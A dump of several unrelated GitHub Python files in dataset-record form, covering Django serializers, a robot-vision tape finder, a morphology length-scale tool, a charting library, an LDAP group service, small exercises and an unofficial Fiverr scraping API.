\"STtest.jpg\")","repo_name":"clguo/SD_Unet_Tensorflow","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"24359323218","text":"from rest_framework import serializers\n\nfrom plants.models import Plant, Species, Watering\n\n\nclass SpeciesSerializer(serializers.ModelSerializer):\n lighting = serializers.StringRelatedField()\n\n class Meta:\n model = Species\n fields = ['days_between_watering_min', 'days_between_watering_max', 'lighting',\n 'fertilize_frequency', 'fertilizer']\n\n\nclass WateringSerializer(serializers.ModelSerializer):\n class Meta:\n model = Watering\n fields = ['date', 'fertilized']\n\n\nclass PlantListSerializer(serializers.ModelSerializer):\n class Meta:\n model = Plant\n fields = ['id', 'name', 'latest_watering_date',\n 'next_watering_min', 'next_watering_max',\n 'days_till_next_watering_min', 'days_till_next_watering_max',\n 'time_till_next_watering']\n\n\nclass PlantViewSerializer(serializers.ModelSerializer):\n species = SpeciesSerializer()\n watered = WateringSerializer(many=True)\n spot = serializers.StringRelatedField()\n\n class Meta:\n model = Plant\n fields = ['id', 'species', 'watered', 'name', 'spot', 'latest_watering_date',\n 'next_watering_min', 'next_watering_max',\n 'days_till_next_watering_min', 'days_till_next_watering_max',\n 'time_till_next_watering']\n","repo_name":"erkarp/comics-scrape","sub_path":"plants/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29996438760","text":"from enum import Enum\nimport cv2\nimport libcamera\nimport msgpack\nimport numpy as np\n\nfrom cscore import CameraServer\nfrom ntcore import NetworkTableInstance\nfrom picamera2 import Picamera2\nfrom pupil_apriltags import Detector\nimport math\n \nclass RetroFinder:\n\n def __init__(self, topic_name, camera_params, hsv_lower, hsv_higher):\n self.hsv_lower = hsv_lower\n self.hsv_higher = hsv_higher\n self.scale_factor = 641\n self.width = camera_params[0]\n self.height = camera_params[1]\n self.tape_height = .105\n self.theta = 0\n self.topic_name = topic_name\n self.initialize_nt()\n self.output_stream = CameraServer.putVideo(\"Processed\", self.width, self.height)\n\n def initialize_nt(self):\n \"\"\"Start NetworkTables with Rio as server, set up publisher.\"\"\"\n inst = NetworkTableInstance.getDefault()\n inst.startClient4(\"retro-finder\")\n # this is always the RIO IP address; set a matching static IP on your\n # laptop if you're using this in simulation.\n inst.setServer(\"10.1.0.2\")\n # Table for vision output information\n self.vision_nt = inst.getTable(\"RetroVision\")\n self.vision_nt_msgpack = self.vision_nt.getRawTopic(self.topic_name).publish(\n \"msgpack\"\n )\n\n def find(self, img):\n green_range = cv2.inRange(img, self.hsv_lower, self.hsv_higher)\n img_rgb = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)\n floodfill = green_range.copy()\n h, w = green_range.shape[:2]\n mask = np.zeros((h+2, w+2), np.uint8)\n cv2.floodFill(floodfill, mask, (0,0), 255)\n floodfill_inv = cv2.bitwise_not(floodfill)\n img_floodfill = green_range | floodfill_inv\n median = cv2.medianBlur(img_floodfill, 5)\n \n contours, hierarchy = cv2.findContours(\n median, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n tapes = {}\n tapes[\"tapes\"] = []\n for c in contours:\n _, _, cnt_width, cnt_height = cv2.boundingRect(c)\n if (cnt_height < 50):\n continue\n if (cnt_height/cnt_width < 2):\n continue\n if (cnt_height/cnt_width > 5):\n continue\n mmnts = cv2.moments(c)\n \n if (mmnts[\"m00\"] == 0):\n continue\n cX = int(mmnts[\"m10\"] / mmnts[\"m00\"])\n cY = int(mmnts[\"m01\"] / mmnts[\"m00\"])\n\n translation_x = (cX-self.width/2)* \\\n (self.tape_height*math.cos(self.theta)/cnt_height)\n translation_y = (cY-self.height/2) * \\\n (self.tape_height*math.cos(self.theta)/cnt_height)\n translation_z = (self.tape_height*self.scale_factor*math.cos(self.theta))/(cnt_height)\n\n tape = [translation_x, translation_y, translation_z]\n wpi_t = [tape[2], -tape[0], -tape[1]]\n tapes[\"tapes\"].append(\n {\n \"pose_t\": wpi_t\n }\n )\n self.draw_result(img_rgb, c, cX, cY, wpi_t)\n self.output_stream.putFrame(img_rgb)\n return tapes\n\n def draw_result(self, img, cnt, cX, cY, wpi_t):\n wpi_tb = np.array(wpi_t)\n float_formatter = {\"float_kind\": lambda x: f\"{x:4.1f}\"}\n cv2.drawContours(img, [cnt], -1, (0, 255, 0), 2)\n cv2.circle(img, (int(cX), int(cY)), 7, (0, 0, 0), -1)\n cv2.putText(img, f\"t: {np.array2string(wpi_tb.flatten(), formatter=float_formatter)}\", (int(cX) - 20, int(cY) - 20),\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n\n def analyze(self, request):\n buffer = request.make_array(\"lores\")\n # img = np.frombuffer(buffer, dtype=np.uint8)\n img = buffer\n # print(buffer.shape)\n # img = img.reshape((self.height, self.width))\n img_bgr = cv2.cvtColor(img, cv2.COLOR_YUV420p2BGR)\n img_bgr = img_bgr[176:426,:,:]\n img_hsv = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2HSV)\n img_hsv = np.ascontiguousarray(img_hsv)\n tapes = self.find(img_hsv)\n posebytes = msgpack.packb(tapes)\n\n self.vision_nt_msgpack.set(posebytes)\n\ndef main():\n print(\"main\")\n fullwidth = 1664\n fullheight = 1232\n width = 832\n height = 616\n # option 3: tiny, trade speed for detection distance; two circles, three squraes, ~40ms\n # width=448\n # height=308\n # fast path\n # width=640\n # height=480\n # medium crop\n # width=1920\n # height=1080\n\n camera = Picamera2()\n camera_config = camera.create_still_configuration(\n # one buffer to write, one to read, one in between so we don't have to wait\n buffer_count=6,\n main={\n \"format\": \"YUV420\",\n \"size\": (fullwidth, fullheight),\n },\n lores={\"format\": \"YUV420\", \"size\": (width, height)},\n controls={\n \"FrameDurationLimits\": (5000, 33333), # 41 fps\n # noise reduction takes time\n \"NoiseReductionMode\": libcamera.controls.draft.NoiseReductionModeEnum.Off,\n \"AwbEnable\": False,\n \"AeEnable\": False,\n #\"AeEnable\": True, # for testing\n #\"AnalogueGain\": 4.0\n },\n)\n camera_config[\"transform\"] = libcamera.Transform(hflip=1, vflip=1)\n print(\"REQUESTED\")\n print(camera_config)\n camera.align_configuration(camera_config)\n print(\"ALIGNED\")\n print(camera_config)\n camera.configure(camera_config)\n print(camera.camera_controls)\n\n # Roborio IP: 10.1.0.2\n # Pi IP: 10.1.0.11\n camera_params = [width, 250]\n topic_name = \"tapes\"\n output = RetroFinder(topic_name, camera_params, (20, 250, 100), (60, 255, 255))\n\n camera.start()\n try:\n while True:\n request = camera.capture_request()\n try:\n output.analyze(request)\n finally:\n request.release()\n finally:\n camera.stop()\nmain()\n","repo_name":"Team100/main2023","sub_path":"vision/retro_finder.py","file_name":"retro_finder.py","file_ext":"py","file_size_in_byte":5866,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24429039911","text":"import numpy as np\nimport cv2 as cv\n\ndef ruler_initialize(arr,phys_size,margin_size):\n phys_size = np.array(phys_size)[np.squeeze(np.array(phys_size)).nonzero()] # physical size\n assert np.squeeze(arr).ndim == len(phys_size), 'Input array and physical size must match.'\n assert np.squeeze(arr).ndim == 2, 'Only 2d patterns are accepted.'\n\n '''\n Users sometimes need to discard certain marginal regions, the withds of which are specified by margin_size.\n The first pair of elements correspond to the first dimension, the second pair of elements correspond to the second dimension,\n and the third pair of elements, if there are, correspond to the third dimension.\n '''\n margin_size = np.reshape(margin_size,(-1,2))\n return phys_size, margin_size\n\ndef minimum_length(arr,phys_size,margin_size=np.zeros((3,2)),threshold=0.5,len_arr=None):\n '''\n Compute the minimum length scale in a design pattern. The design pattern is arr.\n The physical size is phys_size. The size of borders that need to be discarded is margin_size.\n The binary values of pixels are thresholded by threshold.\n '''\n\n phys_size, margin_size = ruler_initialize(arr,phys_size,margin_size)\n dims = len(phys_size) # dimension, should be 2 or 3\n arr = binarize(arr,threshold)\n margin_number = margin(arr,phys_size,margin_size)\n pixel_size = get_pixel_size(arr,phys_size)\n\n if np.array(len_arr).any(): # search the minimum length scale within a length array \"len_arr\"\n diameter_list = sorted(list(np.abs(len_arr)/2))\n for diameter in diameter_list:\n kernel = get_structuring_element(diameter,pixel_size)\n # difference between open and close\n diff_image = \\\n abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr, cv.MORPH_CLOSE, kernel).astype(np.int8))\n\n # number of interior pixels\n pixel_in = interior_pixel_count(diff_image,margin_number,dims)\n\n if pixel_in>0:\n return diameter\n\n print(\"The minimum length scale is not in this array of lengths.\")\n return\n\n else: # find the minimum length scale via binary search if \"len_arr\" is not provided\n diameter = min(phys_size) # maximum meaningful filter radius\n kernel = get_structuring_element(diameter,pixel_size)\n diff_image = \\\n abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr,cv.MORPH_CLOSE,kernel).astype(np.int8))\n pixel_in = interior_pixel_count(diff_image,margin_number,dims) \n\n if pixel_in>0:\n diameters = [0,diameter/2,diameter]\n while abs(diameters[0]-diameters[2])>min(pixel_size):\n diameter = diameters[1]\n kernel = get_structuring_element(diameter,pixel_size)\n diff_image = \\\n abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr, cv.MORPH_CLOSE, kernel).astype(np.int8))\n pixel_in = interior_pixel_count(diff_image,margin_number,dims)\n\n if pixel_in==0: diameters[0],diameters[1] = diameter,(diameter+diameters[2])/2 # radius is too small\n else: diameters[1],diameters[2] = (diameter+diameters[0])/2,diameter # radius is still large\n\n return diameters[0]\n\n else: # min(phys_size) is not a good starting diameter of the binary search\n diameter_initial,pixel_in_initial = diameter/1.5,0 # decrease the diameter\n # search a starting radius until interior pixels emerge or the diameter is unacceptably small\n while pixel_in_initial==0 and diameter_initial>min(pixel_size):\n diameter_initial /= 1.5\n kernel = get_structuring_element(diameter_initial,pixel_size)\n diff_image_initial = \\\n abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel).astype(np.int8)-cv.morphologyEx(arr, cv.MORPH_CLOSE, kernel).astype(np.int8))\n pixel_in_initial = interior_pixel_count(diff_image_initial,margin_number,dims)\n\n if pixel_in_initial>0: # start the binary search\n diameters = [0,diameter/2,diameter]\n while abs(diameters[0]-diameters[2])>min(pixel_size):\n diameter = diameters[1]\n kernel = get_structuring_element(diameter,pixel_size)\n diff_image = abs(cv.morphologyEx(arr,cv.MORPH_OPEN,kernel)-cv.morphologyEx(arr, cv.MORPH_CLOSE, kernel))\n pixel_in = interior_pixel_count(diff_image,margin_number,dims)\n\n if pixel_in==0: diameters[0],diameters[1] = diameter,(diameter+diameters[2])/2 # radius is too small\n else: diameters[1],diameters[2] = (diameter+diameters[0])/2,radius # radius is still large\n return diameters[0]\n\n else: # pixel_in_initial==0, fail to find a starting radius\n print(\"The minimum length scale is at least \", min(pixel_size))\n return\n\ndef get_structuring_element(diameter,pixel_size):\n se_shape = np.array(np.round(diameter/pixel_size),dtype=int)\n rounded_size = np.round(diameter/pixel_size)*pixel_size\n if se_shape[0]==0: x_tick = [0]\n else: x_tick = np.linspace(-rounded_size[0]/2,rounded_size[0]/2,se_shape[0])\n if se_shape[1]==0: y_tick = [0]\n else: y_tick = np.linspace(-rounded_size[1]/2,rounded_size[1]/2,se_shape[1])\n\n if len(pixel_size) == 2:\n X, Y = np.meshgrid(x_tick, y_tick, sparse=True, indexing='ij') # grid over the entire design region\n structuring_element = X**2+Y**2 <= diameter**2/4\n else:\n raise AssertionError(\"Function for this dimension is not implemented!\")\n\n return np.array(structuring_element,dtype=np.uint8)\n\ndef margin(arr,phys_size,margin_size):\n # compute the numbers of pixels corresponding to the marginal widths\n\n arr = np.squeeze(arr)\n margin_number = margin_size[0,:]/phys_size[0]*arr.shape[0]\n\n for dim_idx in range(1,len(phys_size)):\n margin_number = np.vstack((margin_number,margin_size[dim_idx,:]/phys_size[dim_idx]*arr.shape[dim_idx]))\n margin_number = np.round(margin_number).astype(int) # numbers of pixels of marginal regions\n\n assert (margin_number>=0).all(), 'Margin widths should be nonnegative!'\n assert (np.array(arr.shape)-np.sum(margin_number,axis=1)>=3).all(), 'Too wide margin or too narrow design region!'\n\n for ii in range(margin_number.shape[0]):\n for jj in range(margin_number.shape[1]):\n if margin_number[ii,jj]==0:\n margin_number[ii,jj] = 1 # minimum possible margin_number\n\n return margin_number\n\ndef get_pixel_size(arr,phys_size):\n squeeze_shape = np.array(np.squeeze(arr).shape)\n return phys_size/squeeze_shape # sizes of a pixel along all finite-thickness directions\n\ndef binarize(arr,demarcation=0.5):\n arr_normalized = (arr-min(arr.flatten()))/(max(arr.flatten())-min(arr.flatten())) # normalize the data of the array\n arr_binarized = np.sign(arr_normalized-demarcation)/2+0.5 # binarize the data of the array with the threshold demarcation=0.5\n return np.array(arr_binarized,dtype=np.uint8)\n\ndef guarantee_2or3d(arr):\n arr = np.squeeze(arr)\n if arr.ndim == 2 or arr.ndim == 3:\n arr_out = arr\n elif arr.ndim == 1:\n arr_out = np.expand_dims(arr, axis=(1, 2)) \n elif arr.ndim == 0:\n arr_out = np.expand_dims(arr, axis=(0, 1, 2)) \n else:\n raise AssertionError(\"Too many dimensions!\")\n return arr_out\n\ndef interior_pixel_count(arr,margin_number=np.ones((2,2),dtype=int),dims=2):\n # return the number of interior pixels with nonzero values\n\n pixel_int = 0 # initialize before counting\n arr = np.squeeze(arr)\n row_begin, row_end = margin_number[0,0], arr.shape[0]-margin_number[0,1]\n column_begin,column_end = margin_number[1,0], arr.shape[1]-margin_number[1,1]\n\n if dims==2:\n selector = arr[row_begin:row_end,column_begin:column_end] * \\\n arr[row_begin-1:row_end-1,column_begin:column_end] * arr[row_begin+1:row_end+1,column_begin:column_end] * \\\n arr[row_begin:row_end,column_begin-1:column_end-1] * arr[row_begin:row_end,column_begin+1:column_end+1]\n\n else:\n raise AssertionError(\"Function for this dimension is not implemented!\")\n\n return np.sum(selector)\n","repo_name":"mawc2019/ruler","sub_path":"ruler_cv_1119.py","file_name":"ruler_cv_1119.py","file_ext":"py","file_size_in_byte":8373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14135867993","text":"import copy\nimport warnings\n\nfrom mapreduce.lib.graphy import common\n\n\nclass LineStyle(object):\n\n \"\"\"Represents the style for a line on a line chart. Also provides some\n convenient presets.\n\n Object attributes (Passed directly to the Google Chart API. Check there for\n details):\n width: Width of the line\n on: Length of a line segment (for dashed/dotted lines)\n off: Length of a break (for dashed/dotted lines)\n color: Color of the line. A hex string, like 'ff0000' for red. Optional,\n AutoColor will fill this in for you automatically if empty.\n\n Some common styles, such as LineStyle.dashed, are available:\n solid\n dashed\n dotted\n thick_solid\n thick_dashed\n thick_dotted\n \"\"\"\n\n # Widths\n THIN = 1\n THICK = 2\n\n # Patterns\n # ((on, off) tuples, as passed to LineChart.AddLine)\n SOLID = (1, 0)\n DASHED = (8, 4)\n DOTTED = (2, 4)\n\n def __init__(self, width, on, off, color=None):\n \"\"\"Construct a LineStyle. See class docstring for details on args.\"\"\"\n self.width = width\n self.on = on\n self.off = off\n self.color = color\n\n\nLineStyle.solid = LineStyle(1, 1, 0)\nLineStyle.dashed = LineStyle(1, 8, 4)\nLineStyle.dotted = LineStyle(1, 2, 4)\nLineStyle.thick_solid = LineStyle(2, 1, 0)\nLineStyle.thick_dashed = LineStyle(2, 8, 4)\nLineStyle.thick_dotted = LineStyle(2, 2, 4)\n\n\nclass LineChart(common.BaseChart):\n\n \"\"\"Represents a line chart.\"\"\"\n\n def __init__(self, points=None):\n super(LineChart, self).__init__()\n if points is not None:\n self.AddLine(points)\n\n def AddLine(self, points, label=None, color=None,\n pattern=LineStyle.SOLID, width=LineStyle.THIN, markers=None):\n \"\"\"Add a new line to the chart.\n\n This is a convenience method which constructs the DataSeries and appends it\n for you. It returns the new series.\n\n points: List of equally-spaced y-values for the line\n label: Name of the line (used for the legend)\n color: Hex string, like 'ff0000' for red\n pattern: Tuple for (length of segment, length of gap). i.e.\n LineStyle.DASHED\n width: Width of the line (i.e. LineStyle.THIN)\n markers: List of Marker objects to attach to this line (see DataSeries\n for more info)\n \"\"\"\n if color is not None and isinstance(color[0], common.Marker):\n warnings.warn('Your code may be broken! '\n 'You passed a list of Markers instead of a color. The '\n 'old argument order (markers before color) is deprecated.',\n DeprecationWarning, stacklevel=2)\n style = LineStyle(width, pattern[0], pattern[1], color=color)\n series = common.DataSeries(points, label=label, style=style,\n markers=markers)\n self.data.append(series)\n return series\n\n def AddSeries(self, points, color=None, style=LineStyle.solid, markers=None,\n label=None):\n \"\"\"DEPRECATED\"\"\"\n warnings.warn('LineChart.AddSeries is deprecated. Call AddLine instead. ',\n DeprecationWarning, stacklevel=2)\n return self.AddLine(points, color=color, width=style.width,\n pattern=(style.on, style.off), markers=markers,\n label=label)\n\n\nclass Sparkline(LineChart):\n \"\"\"Represent a sparkline. These behave like LineCharts,\n mostly, but come without axes.\n \"\"\"\n","repo_name":"livid/v2ex-gae","sub_path":"mapreduce/lib/graphy/line_chart.py","file_name":"line_chart.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":3095,"dataset":"github-code","pt":"53"} +{"seq_id":"32921692712","text":"# -*- coding: utf-8 -*-\n\nfrom .base import Service, ACTIVE_DIRECTORY\nfrom redap.exceptions import RedapError\nfrom redap.settings import group_schema\n\n\nclass GroupService(Service):\n __model__ = group_schema.ldap_model\n __config__ = group_schema.data\n\n @property\n def _users(self):\n from redap.services import users\n return users\n\n def get_members(self, group_id, include_nested=False, **kwargs):\n group_dn = self.get_one(group_id).dn\n\n if str(include_nested).lower() in [str(1), 'true']:\n self._raise_if_incompatible_with(ACTIVE_DIRECTORY)\n kwargs['filter'] = '(memberOf:1.2.840.113556.1.4.1941:={0})'.format(group_dn)\n else:\n kwargs['filter'] = '(memberOf={0})'.format(group_dn)\n\n return self._users.get_many(**kwargs)\n\n def add_member(self, group_id, payload):\n user = self._users.get_one(payload['id'])\n group = self.get_one(group_id)\n if self._users.is_member_of(user.id, group.dn):\n msg = \"User {0} is already member of {1}\".format(user.id, group_id)\n raise RedapError(msg, status_code=400)\n\n self._microsoft_ext.add_members_to_groups([user.dn], [group.dn], payload.pop('fix', False))\n\n def remove_member(self, group_id, user_id):\n user = self._users.get_one(user_id)\n group = self.get_one(group_id)\n if not self._users.is_member_of(user_id, group.dn):\n msg = \"User {0} is not a member of {1}\".format(user_id, group_id)\n raise RedapError(msg, status_code=400)\n\n self._microsoft_ext.remove_members_from_groups([user.dn], [group.dn], fix=False)\n","repo_name":"rbw/redap","sub_path":"redap/services/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"20350959604","text":"import sys\ninput = sys.stdin.readline\n\nif __name__ == \"__main__\":\n N = int(input().strip())\n k = int(input().strip())\n # temp = []\n # for i in range(1, N+1):\n # for j in range(1, N+1):\n # print(i*j, end=' ')\n # temp.append(i*j)\n # print()\n # print()\n # temp.sort()\n # print(temp[k-1])\n start = 1\n end = k\n result = 0\n while (end - start) >= 0:\n mid = (start + end)//2\n cnt = 0\n for i in range(1, N+1):\n cnt += min(mid//i, N)\n # print(start, end, cnt)\n if cnt >= k:\n result = mid\n end = mid - 1\n else:\n start = mid + 1\n print(result)\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/1300/1300.py","file_name":"1300.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22047112162","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom pygraph import line\nfrom pygraph import util\n\ng = util.mkGraph((80, 60))\nends = [\n (20, 10), (20, -10),\n (10, 20), (10, -20), \n (-10, 20), (-10, -20), \n (-20, 10), (-20, -10)\n]\n\ntends = [(x[0] + 40, x[1] + 30) for x in ends]\n\nfor end in tends:\n line.mkLine(g, (40, 30), end)\n \nline.mkLine(g, (10, 20), (60, 50))\n\nutil.saveG(\"line.png\", util.enLarge(g))","repo_name":"emliunix/pygraph","sub_path":"script_line.py","file_name":"script_line.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38149487173","text":"\r\ndef solution(S):\r\n if len(S)%2 == 0:\r\n return -1\r\n mid = len(S)//2\r\n start = 0\r\n end = -1\r\n while start < mid:\r\n if S[start] != S[end]:\r\n return -1\r\n start += 1 \r\n end -= 1\r\n print(mid)\r\n return mid\r\n\r\nsolution('racecar') ","repo_name":"edwinmesa/dt_learn_data_science","sub_path":"python/StrSymmetryPoint.PY","file_name":"StrSymmetryPoint.PY","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73152104167","text":"from bs4 import BeautifulSoup\nimport pdb\n\n\nf = open('tempfile', 'r')\ndata = f.read()\n#pdb.set_trace()\nsoup = BeautifulSoup(data, \"html.parser\")\n\ntags = soup.findAll('li', { \"class\" : \"grid-tile\" })\n#pdb.set_trace()\nfor tag in tags:\n\n\t#print(tag)\n\n\t#IMAGE\n\timg_url = tag.find('a', { \"class\" : \"thumb-link\" } ).img['src']\n\t#print(img_url)\n\t#NAME AND URL\n\tname_and_url = tag.find('a', { \"class\" : \"name-link\" } )\n\t\t#NAME\n\t#print(name_and_url.string.strip())\n\t\t#URL\n\t#print(name_and_url['href'])\n\t#pdb.set_trace()\n\tprices = tag.find('div', { \"class\": \"product-pricing\" })\n\t#This only happens if there's sales/promos\n\tif prices.div != None:\n\t\tspans = prices.div.findAll('span')\n\t\tfor span in spans:\n\n\t\t\t#REGULAR PRICE\n\t\t\tif span['class'][0] == 'product-standard-price':\n\t\t\t\tif span.string:\n\t\t\t\t\tprint(span.string.strip())\n\t\t\t\n\t\t\t#SALE PRICE\n\t\t\telif span['class'][0] == 'product-sales-price':\n\t\t\t\tif span.string:\n\t\t\t\t\tprint(span.string.strip())\n\n\t#Otherwise no sale/promo just take the inner price\n\telse:\n\t\tif prices.string:\n\t\t\tprint(prices.string.strip())\n\t#print(prices)","repo_name":"jpaprakis/shop-scraper","sub_path":"test-soup.py","file_name":"test-soup.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23758323382","text":"\"\"\"\nUnofficial Fiverr API helps you to get:\n\n* Seller Details\n* Seller Gigs\n* Seller Orders\n* Seller Transactions\n* Seller Reviews\n * Group by buyers\n * Filter by Impression\n * Sort by time\n * Limit no. of reviews\n\"\"\"\n\nfrom typing import Union\nfrom enum import Enum\nimport json\nfrom cloudscraper.exceptions import CloudflareChallengeError\n\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.security import HTTPBearer\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom bs4 import BeautifulSoup\nimport requests\nimport cloudscraper\n\nDESCRIPTION = __doc__ or \"\"\ntags_metadata = [\n {\"name\": \"Home\"},\n {\"name\": \"Seller Details\", \"description\": \"Get details about seller\"},\n]\n\nURL = \"https://www.fiverr.com\"\nbearer_description = f\"\"\"\n### Steps to obtain authorization token from Fiverr:\n- Login into your [Fiverr account]({URL})\n- Open Network Tab of browser\n- Select any `HTML` or `XHR` request\n- Go to `Cookies` tab\n- Use `hodor_creds` as authorization token\n\n> I DO NOT store your credentials. You can verify that by viewing source code [here](https://www.github.com/salmannotkhan/fiverr-api)\n\"\"\"\n\nbearer = HTTPBearer(auto_error=True, description=bearer_description)\n\napp = FastAPI(\n title=\"Unofficial Fiverr API\",\n description=DESCRIPTION,\n version=\"1.2\",\n contact={\n \"name\": \"Salman Shaikh\",\n \"url\": \"https://salmannotkhan.github.io/\",\n \"email\": \"tony903212@gmail.com\",\n },\n openapi_tags=tags_metadata,\n)\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"GET\"],\n allow_headers=[\"*\"],\n)\n\n\nclass FilterBy(str, Enum):\n \"\"\"\n Filter by Enum Class\n \"\"\"\n\n POSITIVE = \"positive\"\n NEGATIVE = \"negative\"\n\n\nclass SortBy(str, Enum):\n \"\"\"\n Sort by Enum Class\n \"\"\"\n\n RECENT = \"recent\"\n RELEVANT = \"relevant\"\n\n\ncommon_headers = {\n \"User-Agent\": \"Mozilla Firefox\",\n \"Accept\": \"application/json\",\n \"Accept-Language\": \"en-US,en;q=0.9\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Sec-Fetch-Dest\": \"empty\",\n \"Sec-Fetch-Mode\": \"cors\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"X-Requested-With\": \"XMLHttpRequest\",\n}\n\ndef get_user_data(username: str):\n \"\"\"\n Get basic seller details and CSRF Token\n \"\"\"\n scraper = cloudscraper.create_scraper()\n seller_url = f\"{URL}/{username}\"\n data = scraper.get(seller_url)\n soup = BeautifulSoup(data.text, \"lxml\")\n seller_data = json.loads(\n soup.find(\"script\", id=\"perseus-initial-props\").string or \"null\"\n )\n seller_data[\"csrfToken\"] = soup.find(\"meta\", {\"property\": \"csrfToken\"}).get(\n \"content\"\n )\n return scraper.cookies, seller_data\n\n\n@app.get(\"/\", tags=[\"Home\"])\nasync def index():\n \"\"\"\n Home Path for API\n \"\"\"\n return {\n \"Welcome to\": \"Unofficial Fiverr API\",\n \"For docs\": \"Visit /docs\",\n \"For redocs\": \"Visit /redoc\",\n }\n\n\n@app.get(\"/transaction\", tags=[\"Seller Details\"])\nasync def get_transactions(after: Union[str, None] = None, token=Depends(bearer)):\n \"\"\"\n Use `endCursor` as `after` for pagination\n \"\"\"\n scraper = cloudscraper.create_scraper()\n url = f\"{URL}/perseus/financial-dashboard/api/earnings/transactions\"\n cookies = {\"hodor_creds\": token.credentials}\n while True:\n try:\n res = scraper.get(\n url,\n headers=common_headers,\n cookies=cookies,\n allow_redirects=False,\n params={\"after\": after},\n )\n break\n except CloudflareChallengeError:\n pass\n data = res.json()\n data[\"data\"][\"transactions\"] = list(\n map(\n lambda x: {**x, \"amount\": (x[\"amount\"] / 100)}, data[\"data\"][\"transactions\"]\n )\n )\n return data\n\n\n@app.get(\"/{username}\", tags=[\"Seller Details\"])\nasync def get_seller_details(username: str):\n \"\"\"\n Remove unnecessary details from seller card and returns it\n \"\"\"\n _, user_data = get_user_data(username)\n seller_card = user_data[\"userData\"][\"seller_card\"]\n seller_profile = user_data[\"userData\"][\"seller_profile\"]\n seller_card.update(seller_profile)\n return seller_card\n\n\n@app.get(\"/{username}/gigs\", tags=[\"Seller Details\"])\nasync def get_gigs(username: str):\n \"\"\"\n Get seller gigs\n \"\"\"\n _, user_data = get_user_data(username)\n return user_data[\"gigs\"][\"gigs\"]\n\n\n@app.get(\"/{username}/reviews\", tags=[\"Seller Details\"])\nasync def get_reviews(\n username: str,\n filter_by: Union[FilterBy, None] = None,\n sort_by: Union[SortBy, None] = None,\n group_by_buyer: bool = False,\n limit: int = 9999,\n):\n \"\"\"\n Get seller reviews\n \"\"\"\n session = requests.session()\n cookies, user_data = get_user_data(username)\n session.cookies = cookies\n url = f\"{URL}/reviews/user_page/fetch_user_reviews/{user_data['userData']['user']['id']}\"\n\n # Adding CSRF Token\n common_headers[\"X-CSRF-Token\"] = user_data[\"csrfToken\"]\n common_headers[\"Referer\"] = f\"https://www.fiverr.com/{username}\"\n # Setting up payload\n payload: dict[str, str] = {}\n payload[\"user_id\"] = user_data[\"userData\"][\"user\"][\"id\"]\n if filter_by:\n payload[\"filter_by\"] = filter_by.value\n if sort_by:\n payload[\"sort_by\"] = sort_by.value\n reviews: list[dict[str, str]] = []\n\n scraper = cloudscraper.create_scraper(sess=session, browser=\"chrome\")\n while True:\n data = scraper.get(url, headers=common_headers, params=payload)\n data = data.json()\n reviews.extend(data[\"reviews\"])\n if not data[\"has_next\"] or len(reviews) >= limit:\n break\n payload[\"last_star_rating_id\"] = reviews[-1][\"id\"]\n payload[\"last_review_id\"] = reviews[-1][\"id\"]\n payload[\"last_score\"] = \"0\"\n reviews = reviews[:limit]\n if group_by_buyer:\n merged_reviews: dict[str, list[dict[str, str]]] = {}\n for review in reviews:\n if review[\"username\"] in merged_reviews:\n merged_reviews[review[\"username\"]].append(review)\n else:\n merged_reviews[review[\"username\"]] = [review]\n return merged_reviews\n session.close()\n return reviews\n\n\n@app.get(\"/{username}/orders\", tags=[\"Seller Details\"])\nasync def get_orders(username: str, token=Depends(bearer)):\n url = f\"{URL}/users/{username}/manage_orders/type/completed\"\n cookies = {\"hodor_creds\": token.credentials}\n results = []\n scraper = cloudscraper.create_scraper()\n while True:\n while True:\n try:\n res = scraper.get(\n url, headers=common_headers, cookies=cookies, allow_redirects=False\n )\n break\n except CloudflareChallengeError:\n pass\n\n if res.status_code == 302:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED, detail=\"Unauthorized profile\"\n )\n data = res.json()\n results.extend(data[\"results\"])\n if not data.get(\"load_more_url\"):\n break\n url = \"https://www.fiverr.com\" + data[\"load_more_url\"]\n return 